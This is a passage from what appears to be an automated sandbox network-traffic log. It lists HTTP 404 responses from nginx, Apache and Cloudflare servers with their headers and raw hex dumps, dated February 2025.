d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:41:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HDTij1PhNd5PDR6xlrNdXUtaFgwYXMN18pk4RJL56a3IRbke3hSQU3xieZoBG2LgzDBr3x%2FLrOPBvratVIPt2Ec3epO52SM4jXhhBTHxb62JHCkFC%2F99Jh0eNj5r10%2F0SMYFwsu1Z9M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fcf293a0a485f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=38898&min_rtt=38898&rtt_var=19449&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=561&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:41:45 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:41:48 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:41:51 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:41:53 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:41:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:42:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:42:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:42:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 18 Feb 2025 17:42:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d\|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#\|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 18 Feb 2025 17:42:56 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d\|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#\|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 18 Feb 2025 17:42:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d\|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#\|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 18 Feb 2025 17:43:01 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:43:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5CP%2BeC4JUT8dzrIl%2B2hUPY64C5JBAFMYrUouebQkTaHIBhpUDadhX6jUOGp0BSxAWBwrjt6d%2FgggvhqEubI%2FEZtrsnhsS%2F9rhnleAQJkz3Ed%2FwVhgN2ExrCAXHpkLEjC5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fd14cadb2ba0c-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67049&min_rtt=67049&rtt_var=33524&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 cb cb 2d 37 36 33 d5 ab a8 ac 52 b2 d1 87 ea 03 00 00 00 ff ff 03 00 af c2 1c df 40 00 00 00 0d 0a Data Ascii: 55)N.,(+K/ON,(JMSUP())(///-763R@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:43:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiafNg42UMcAFLlBWRM%2F33T61BzNcNsU43lWLxSpqrIbpmC%2BuGm4Gu4VWi3XTMwOu651AVFsp8zWidVF45Rvb8tr1JZg6fovlb%2FjtOzI92d0fXyZPn6vJZvMld8l%2BLYxLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fd15c1ba7a2b4-YULContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=17574&min_rtt=17574&rtt_var=8787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 35 0d 0a 1f 8b 08 